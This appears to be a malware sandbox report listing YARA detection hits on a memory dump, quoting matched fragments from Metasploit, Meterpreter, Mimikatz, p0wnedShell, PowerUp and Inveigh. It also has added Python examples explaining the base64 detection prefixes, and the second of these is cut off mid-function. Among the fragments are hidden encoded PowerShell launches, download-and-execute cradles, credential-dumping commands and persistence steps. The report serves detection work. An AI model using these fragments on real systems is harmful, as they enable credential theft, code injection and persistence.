- 0x241e6:$s4: = Runtime.getRuntime().exec(
- 0x38a01:$s4: = Runtime.getRuntime().exec(
- 0x5353f:$s4: = Runtime.getRuntime().exec(
- 0xe2ff:$s5: , 16) & 0xff;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0xe687:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0xdbd1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xe6d3:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xe704:$s3: = CreateObject("Wscript.Shell")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0xe82f:$s1: kernel32.dll WaitForSingleObject),
- 0xe856:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0xe8cd:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0xe933:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0xd505:$s5: = [System.Convert]::FromBase64String(
- 0xe976:$s5: = [System.Convert]::FromBase64String(
- 0xe9a0:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0xe9da:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0xecce:$xx1: 6D 65 74 73 72 76 2E 64 6C 6C 00 00 52 65 66 6C 65 63 74 69 76 65 4C 6F 61 64 65 72
- 0xecf0:$xx2: metsrv.x64.dll
- 0xed03:$xs1: WS2_32.dll
- 0x40a:$xs2: ReflectiveLoader
- 0xaac5:$xs2: ReflectiveLoader
- 0xab88:$xs2: ReflectiveLoader
- 0xabb6:$xs2: ReflectiveLoader
- 0xabdc:$xs2: ReflectiveLoader
- 0xac06:$xs2: ReflectiveLoader
- 0xac32:$xs2: ReflectiveLoader
- 0xadab:$xs2: ReflectiveLoader
- 0xae14:$xs2: ReflectiveLoader
- 0xb1fd:$xs2: ReflectiveLoader
- 0xb279:$xs2: ReflectiveLoader
- 0xecda:$xs2: ReflectiveLoader
- 0xed12:$xs2: ReflectiveLoader
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Base64_PS1_Shellcode | Detects Base64 encoded PS1 Shellcode | Nick Carr, David Ledbetter | - 0x175f6:$substring: AAAAYInlM
- 0x1760e:$substring: AAAAYInlM
- 0x17626:$substring: AAAAYInlM
- 0x1760a:$pattern1: /OiCAAAAYInlM
- 0x17622:$pattern2: /OiJAAAAYInlM
|
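The Base64_PS1_Shellcode row matches on text, not bytes: "/OiCAAAAYInlM" and "/OiJAAAAYInlM" are the base64 of the first nine bytes of the usual msfvenom x86 stager (cld; call +0x82 or +0x89; pushad; mov ebp,esp) plus one extra character. Added example, not part of the report or of the rule authors' tooling: it decodes the whole 4-character groups, shows why the rule stops at the lone "M" (it pins only the top six bits of the tenth byte, 0x30..0x33, so both the `xor edx,edx` and `xor eax,eax` variants that begin 0x31 are covered), and checks which base64 alignments the shorter $substring actually catches. STAGER_HEAD is a constructed stub that follows the common prologue; it is an assumption of the example, not bytes recovered from the dump.

```python
import base64

# Strings from the Base64_PS1_Shellcode row above, exactly as the report prints them.
SUBSTRING = "AAAAYInlM"
PATTERNS = ("/OiCAAAAYInlM", "/OiJAAAAYInlM")
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Constructed stager head (assumption, not taken from the report): cld / call +0x82 /
# pushad / mov ebp,esp / xor edx,edx / mov edx,fs:[edx+0x30].
STAGER_HEAD = bytes.fromhex("fce882000000" "6089e5" "31d2" "648b5230")


def decode_whole_groups(fragment: str) -> bytes:
    """Decode only the complete 4-character groups of a base64 fragment.
    Four characters carry three bytes; 1-3 dangling characters fix just some
    bits of the next byte, so they are dropped rather than guessed at."""
    whole = len(fragment) - len(fragment) % 4
    return base64.b64decode(fragment[:whole])


def dangling_char_byte_range(fragment: str):
    """One trailing character determines the top six bits of the next byte.
    Return the (low, high) byte values it admits, or None if nothing dangles."""
    tail = fragment[len(fragment) - len(fragment) % 4:]
    if len(tail) != 1:
        return None
    top6 = B64_ALPHABET.index(tail)
    return top6 << 2, (top6 << 2) | 0b11


def alignments_hit(shellcode: bytes, needle: str = SUBSTRING) -> list:
    """Base64 text depends on where each 3-byte group starts. Put 0, 1 or 2
    bytes in front of the shellcode and report which placements still contain
    the needle: a fixed substring covers one alignment of three."""
    return [pad for pad in range(3)
            if needle in base64.b64encode(b"\x00" * pad + shellcode).decode()]


if __name__ == "__main__":
    for p in PATTERNS:
        lo, hi = dangling_char_byte_range(p)
        print(p, "->", decode_whole_groups(p).hex(), f"then a byte in {lo:#x}..{hi:#x}")
    print("alignments matched by", SUBSTRING, ":", alignments_hit(STAGER_HEAD))
```

Practical consequence: an encoded blob in which the stager does not start on a 3-byte boundary (a prefix byte, a different loader) produces none of these characters, so a text-level rule like this one is precise but alignment-bound; the byte-level rules elsewhere on this page (Meterpreter_Reverse_Tcp, HKTL_Meterpreter_inMemory) do not have that gap.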
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x12a61:$x1: /\/===\__
- 0x12a6f:$x2: ${__/\/==
- 0x12a7d:$x3: Catch { }
- 0x12a8b:$x4: \_/=} ${_
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_OBFUSC_PowerShell_True_Jun20_1 | Detects indicators often found in obfuscated PowerShell scripts | Florian Roth | - 0x12cf5:$: ${t`rue}
- 0x12d00:$: ${tr`ue}
- 0x12d0b:$: ${tru`e}
- 0x12d16:$: ${t`ru`e}
- 0x12d22:$: ${tr`u`e}
- 0x12d2e:$: ${t`r`ue}
- 0x12d3a:$: ${t`r`u`e}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Recon_Commands_Windows_Gen1 | Detects a set of reconnaissance commands on Windows systems | Florian Roth | - 0x4483b:$s1: netstat -an
- 0x4680c:$s1: netstat -an
- 0x25120:$s3: net user
- 0x30ecd:$s4: whoami
- 0x30ed5:$s4: whoami
- 0x30ee2:$s4: whoami
- 0x30ef2:$s4: whoami
- 0x30efd:$s4: whoami
- 0x3f1c2:$s4: whoami
- 0x3f1ca:$s4: whoami
- 0x3f1d7:$s4: whoami
- 0x5a495:$s4: whoami
- 0x5a524:$s4: whoami
- 0x5a63d:$s4: whoami
- 0x5a6d1:$s4: whoami
- 0x5a7ee:$s4: whoami
- 0x5a87f:$s4: whoami
- 0xc41b:$s11: regsvr32 /s /u
- 0x177ce:$s15: schtasks.exe /Create
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Payload_Exe2Hex | Detects payload generated by exe2hex | Florian Roth | - 0x1aebd:$a1: set /p "=4d5a
- 0x1aecf:$a2: powershell -Command "$hex=
- 0x1aeee:$b1: set+%2Fp+%22%3D4d5
- 0x1af05:$b2: powershell+-Command+%22%24hex
- 0x1af27:$c1: echo 4d 5a
- 0x1af37:$c2: echo r cx >>
- 0x1af48:$d1: echo+4d+5a+
- 0x1af58:$d2: echo+r+cx+%3E%3E
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0xad5d:$x1: \Release\reflective_dll.pdb
- 0xad7d:$x2: reflective_dll.x64.dll
- 0xad98:$s3: DLL Injection
- 0xadaa:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0xae13:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0xb1af:$x1: \ReflectiveDLLInjection-master\
- 0xb1d3:$s2: reflective_dll.dll
- 0xb3ef:$s2: reflective_dll.dll
- 0xb430:$s2: reflective_dll.dll
- 0x5709:$s3: DLL injection
- 0xb1ea:$s3: DLL injection
- 0x52716:$s3: DLL injection
- 0xac05:$s4: _ReflectiveLoader@4
- 0xb1fc:$s4: _ReflectiveLoader@4
- 0xb278:$s4: _ReflectiveLoader@4
- 0xb214:$s5: Reflective Dll Injection
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0xb39c:$s1: \Release\inject.pdb
- 0xb3b4:$s2: !!! Failed to gather information on system processes!
- 0xb1d3:$s3: reflective_dll.dll
- 0xb3ef:$s3: reflective_dll.dll
- 0xb430:$s3: reflective_dll.dll
- 0xb406:$s4: [-] %s. Error=%d
- 0xb41b:$s5: \Start Menu\Programs\reflective_dll.dll
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | GetUserSPNs_VBS | Auto-generated rule - file GetUserSPNs.vbs | Florian Roth | - 0xa559:$s1: Wscript.Echo "User Logon: " & oRecordset.Fields("samAccountName")
- 0xa59f:$s2: Wscript.Echo " USAGE: " & WScript.ScriptName & " SpnToFind [GC Servername or Forestname]"
- 0xa604:$s3: strADOQuery = "<" + strGCPath + ">;(&(!objectClass=computer)(servicePrincipalName=*));" & _
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | GetUserSPNs_PS1 | Auto-generated rule - file GetUserSPNs.ps1 | Florian Roth | - 0xa780:$s1: $ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
- 0xa7d8:$s2: @{Name="PasswordLastSet"; Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} } #, `
- 0xa84d:$s3: Write-Host "No Global Catalogs Found!"
- 0xa878:$s4: $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | kerberoast_PY | Auto-generated rule - file kerberoast.py | Florian Roth | - 0xa9cc:$s1: newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
- 0xaa26:$s2: key = kerberos.ntlmhash(args.password)
- 0xaa51:$s3: help='the password used to decrypt/encrypt the ticket')
- 0xaa8d:$s4: newencserverticket = kerberos.encrypt(key, 2, e, nonce)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedPowerCat | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs | Florian Roth | - 0xf81e:$x1: Now if we point Firefox to http://127.0.0.1
- 0xf84e:$x2: powercat -l -v -p
- 0xf864:$x3: P0wnedListener
- 0xfc2d:$x3: P0wnedListener
- 0xf877:$x4: EncodedPayload.bat
- 0xf88e:$x5: powercat -c
- 0xf89f:$x6: Program.P0wnedPath()
- 0x10804:$x6: Program.P0wnedPath()
- 0xf8b8:$x7: Invoke-PowerShellTcpOneLine
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0xfa1a:$x1: Invoke-TokenManipulation
- 0xffe6:$x1: Invoke-TokenManipulation
- 0xfa37:$x2: windows/meterpreter
- 0x10092:$x2: windows/meterpreter
- 0x11a5c:$x2: windows/meterpreter
- 0xfa4f:$x3: lsadump::dcsync
- 0xfa63:$x4: p0wnedShellx86
- 0xfa76:$x5: p0wnedShellx64
- 0xfe25:$x5: p0wnedShellx64
- 0xfe76:$x5: p0wnedShellx64
- 0xfa89:$x6: Invoke_PsExec()
- 0x3278:$x7: Invoke-Mimikatz
- 0x61c9:$x7: Invoke-Mimikatz
- 0x9550:$x7: Invoke-Mimikatz
- 0x95ef:$x7: Invoke-Mimikatz
- 0xfa9d:$x7: Invoke-Mimikatz
- 0x11bef:$x7: Invoke-Mimikatz
- 0x12418:$x7: Invoke-Mimikatz
- 0x15600:$x7: Invoke-Mimikatz
- 0x157c2:$x7: Invoke-Mimikatz
- 0x15f15:$x7: Invoke-Mimikatz
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedPotato | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs | Florian Roth | - 0xfc1c:$x1: Invoke-Tater
- 0xfc2d:$x2: P0wnedListener.Execute(WPAD_Proxy);
- 0xfc55:$x3: -SpooferIP
- 0xfc66:$x4: TaterCommand()
- 0xfc79:$x5: FileName = "cmd.exe",
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedExploits | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs | Florian Roth | - 0xfdca:$x1: Pshell.RunPSCommand(Whoami);
- 0xfdeb:$x2: If succeeded this exploit should popup a System CMD Shell
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedBinaries | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs | Florian Roth | - 0xff61:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x10411:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x10483:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f
- 0x104f4:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98
- 0x10565:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+
- 0x105d3:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/
- 0x10641:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR
- 0x106af:$x7: namespace p0wnedShell
- 0x1081d:$x7: namespace p0wnedShell
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedAmsiBypass | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs | Florian Roth | - 0xf89f:$x1: Program.P0wnedPath()
- 0x10804:$x1: Program.P0wnedPath()
- 0x106af:$x2: namespace p0wnedShell
- 0x1081d:$x2: namespace p0wnedShell
- 0x10837:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedShell_outputs | p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs | Florian Roth | - 0x10a03:$s1: [+] For this attack to succeed, you need to have Admin privileges.
- 0x10a4a:$s2: [+] This is not a valid hostname, please try again
- 0x10a81:$s3: [+] First return the name of our current domain.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_PowerUp | Auto-generated rule - file PowerUp.ps1 | Florian Roth | - 0x14f0b:$s1: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | % {
- 0x14f62:$s2: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | % {
- 0x14fb8:$s3: if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {
- 0x1503a:$s4: C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath |
- 0x15085:$s5: if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe"))
- 0x150c9:$s6: if (Test-Path ("$Env:SystemRoot\System32\InetSRV\appcmd.exe")) {
- 0x1510f:$s7: Write-Verbose "Executing command '$Cmd'"
- 0x1513c:$s8: Write-Warning "[!] Target service
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Inveigh_BruteForce | Auto-generated rule - file Inveigh-BruteForce.ps1 | Florian Roth | - 0x15297:$s1: Import-Module .\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11
- 0x152ee:$s2: $(Get-Date -format 's') - Attempting to stop HTTP listener")|Out-Null
- 0x15338:$s3: Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_Shellcode | Auto-generated rule - file Invoke-Shellcode.ps1 | Florian Roth | - 0x110d8:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x154b4:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x156f0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x154e8:$s2: Get-ProcAddress kernel32.dll OpenProcess
- 0x15515:$s3: msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
- 0x1558f:$s4: inject shellcode into
- 0x11aac:$s5: Injecting shellcode
- 0x155a9:$s5: Injecting shellcode
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_Mimikatz | Auto-generated rule - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x110d8:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x154b4:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x156f0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x15724:$s2: ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId
- 0x15771:$s3: privilege::debug exit
- 0x1578b:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x15b39:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x157c2:$s5: Invoke-Mimikatz -DumpCreds
- 0x157e1:$s6: | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_RelfectivePEInjection | Auto-generated rule - file Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x15984:$x1: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
- 0x159fa:$x2: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local
- 0x15a60:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken
- 0x15a95:$x4: Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local
- 0x15af3:$s5: $PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')
- 0x15b37:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Persistence | Auto-generated rule - file Persistence.ps1 | Florian Roth | - 0x15c97:$s1: "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```
- 0x15cf2:$s2: }=$PROFILE.AllUsersAllHosts;${
- 0x15d15:$s3: C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
- 0x15d66:$s4: = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture
- 0x15daf:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))
- 0x15e0b:$s6: }=$PROFILE.CurrentUserAllHosts;${
- 0x15e31:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x1692d:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x15e7e:$s8: [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection | Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x16079:$s1: [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
- 0x160eb:$s2: if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
- 0x16148:$s3: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
- 0x161b2:$s4: Function Import-DllInRemoteProcess
- 0x161d9:$s5: FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))
- 0x1620c:$s6: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
- 0x16264:$s7: [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
- 0x162b3:$s8: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
- 0x1631a:$s9: ::FromBase64String('RABvAG4AZQAhAA==')))
- 0x16348:$s10: Write-Verbose "PowerShell ProcessID: $PID"
- 0x16378:$s11: [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Inveigh_BruteForce_2 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x16528:$s1: }.NTLMv2_file_queue[0]|Out-File ${
- 0x1654f:$s2: }.NTLMv2_file_queue.RemoveRange(0,1)
- 0x16578:$s3: }.NTLMv2_file_queue.Count -gt 0)
- 0x1659d:$s4: }.relay_running = $false
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_PowerUp_2 | Auto-generated rule - from files PowerUp.ps1 | Florian Roth | - 0x166e1:$s1: if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::
- 0x1672c:$s2: FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {
- 0x16766:$s3: $Null = Invoke-ServiceStart
- 0x16786:$s4: Write-Warning "[!] Access to service $
- 0x167b1:$s5: } = $MyConString.Split("=")[1].Split(";")[0]
- 0x167e2:$s6: } += "net localgroup ${
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Persistence_2 | Auto-generated rule - from files Persistence.ps1 | Florian Roth | - 0x15e31:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x1692d:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x1697a:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')
- 0x169c3:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')
- 0x16a04:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- 0x16a54:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))
- 0x16aa7:$s6: [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
- 0x16af8:$s7: FromBase64String('TQBlAHQAaABvAGQA')
- 0x16b21:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=')
- 0x16b4e:$s9: [Runtime.InteropServices.CallingConvention]::Winapi,
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Inveigh_BruteForce_3 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x16cc4:$s1: ::FromBase64String('TgBUAEwATQA=')
- 0x16ceb:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))
- 0x16d28:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))
- 0x16d69:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))
- 0x16dae:$s5: [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
- 0x16dfc:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA
- 0x16e3f:$s7: }.bruteforce_running)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Suspicious_PowerShell_Code_1 | Detects suspicious PowerShell code | Florian Roth | - 0x13ac2:$s4: powershell.exe -w hidden -ep bypass -Enc
- 0x13aef:$s5: -w hidden -noni -nop -c "iex(New-Object
- 0x13b1b:$s6: powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth | - 0x149aa:$: ::FromBase64String("H4s
- 0x14b43:$: ::FromBase64String("H4s
- 0x149c4:$: ::FromBase64String("TVq
- 0x149de:$: ::FromBase64String("UEs
- 0x149f8:$: ::FromBase64String("JAB
- 0x14a12:$: ::FromBase64String("SUVY
- 0x14a2d:$: ::FromBase64String("SQBFAF
- 0x14a4a:$: ::FromBase64String("SQBuAH
- 0x14a67:$: ::FromBase64String("PAA
- 0x14a81:$: ::FromBase64String("cwBhA
- 0x14a9d:$: ::FromBase64String("aWV4
- 0x14ab8:$: ::FromBase64String("aQBlA
- 0x14ad4:$: ::FromBase64String("R2V0
- 0x14aef:$: ::FromBase64String("dmFy
- 0x14b0a:$: ::FromBase64String("dgBhA
- 0x14b26:$: ::FromBase64String("dXNpbm
- 0x14b43:$: ::FromBase64String("H4sIA
- 0x14b5f:$: ::FromBase64String("Y21k
- 0x14b7a:$: ::FromBase64String("Qzpc
- 0x14b95:$: ::FromBase64String("Yzpc
- 0x14bb0:$: ::FromBase64String("IAB
|
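The SUSP_PS1_FromBase64String_Content_Indicator strings above work because base64 maps every three input bytes to four output characters, so a fixed leading byte sequence always produces a fixed leading string: a gzip header starts "H4sI", a PE file "TVqQ", a zip archive "UEsD", and UTF-16LE text (what [Text.Encoding]::Unicode produces) has its own characteristic prefixes such as "JAB" for "$" followed by a letter. The same encoding is what the PowerUp, Persistence and Inveigh rules match on when they quote literals like 'QQBNAEQANgA0AA==', which is simply "AMD64" in UTF-16LE. The Python below is an added example, not part of the sandbox report or the rules; it reproduces each prefix from sample bytes, decodes the UTF-16LE literals quoted in this report (re-padding the one the rule cut before its "=" padding), and classifies FromBase64String() arguments in a constructed script. Names and the sample script are hypothetical.

```python
"""Added example: why the FromBase64String prefixes are meaningful, and how
to read the UTF-16LE base64 literals quoted in the report. Not code from the
report or from the YARA rules."""
from __future__ import annotations

import base64
import re

# Rule prefix -> (sample bytes that produce it, what it indicates).
# Text encoded as UTF-16LE reproduces [Text.Encoding]::Unicode.GetBytes().
PREFIX_SOURCES = {
    "H4sI":   (b"\x1f\x8b\x08",            "gzip-compressed payload"),
    "TVq":    (b"MZ\x90\x00",              "PE executable"),
    "UEs":    (b"PK\x03\x04",              "zip archive"),
    "JAB":    ("$v".encode("utf-16-le"),   "UTF-16LE script starting with a variable"),
    "SUVY":   (b"IEX",                     "Invoke-Expression alias, ASCII"),
    "SQBFAF": ("IEX".encode("utf-16-le"),  "Invoke-Expression alias, UTF-16LE"),
    "SQBuAH": ("Inv".encode("utf-16-le"),  "Invoke-* cmdlet, UTF-16LE"),
    "PAA":    ("<#".encode("utf-16-le"),   "UTF-16LE text starting with '<'"),
    "cwBhA":  ("sa".encode("utf-16-le"),   "UTF-16LE text starting with 'sa'"),
    "aWV4":   (b"iex",                     "Invoke-Expression alias, lowercase"),
    "aQBlA":  ("ie".encode("utf-16-le"),   "UTF-16LE text starting with 'ie'"),
    "R2V0":   (b"Get",                     "Get-* cmdlet"),
    "dmFy":   (b"var",                     "C#/JScript source (var)"),
    "dgBhA":  ("va".encode("utf-16-le"),   "UTF-16LE text starting with 'va'"),
    "dXNpbm": (b"using",                   "C# source (using)"),
    "Y21k":   (b"cmd",                     "cmd invocation"),
    "Qzpc":   (b"C:\\",                    "absolute Windows path"),
    "Yzpc":   (b"c:\\",                    "absolute Windows path, lowercase"),
    "IAB":    (" a".encode("utf-16-le"),   "UTF-16LE text starting with a space"),
}


def computed_prefixes() -> dict[str, str]:
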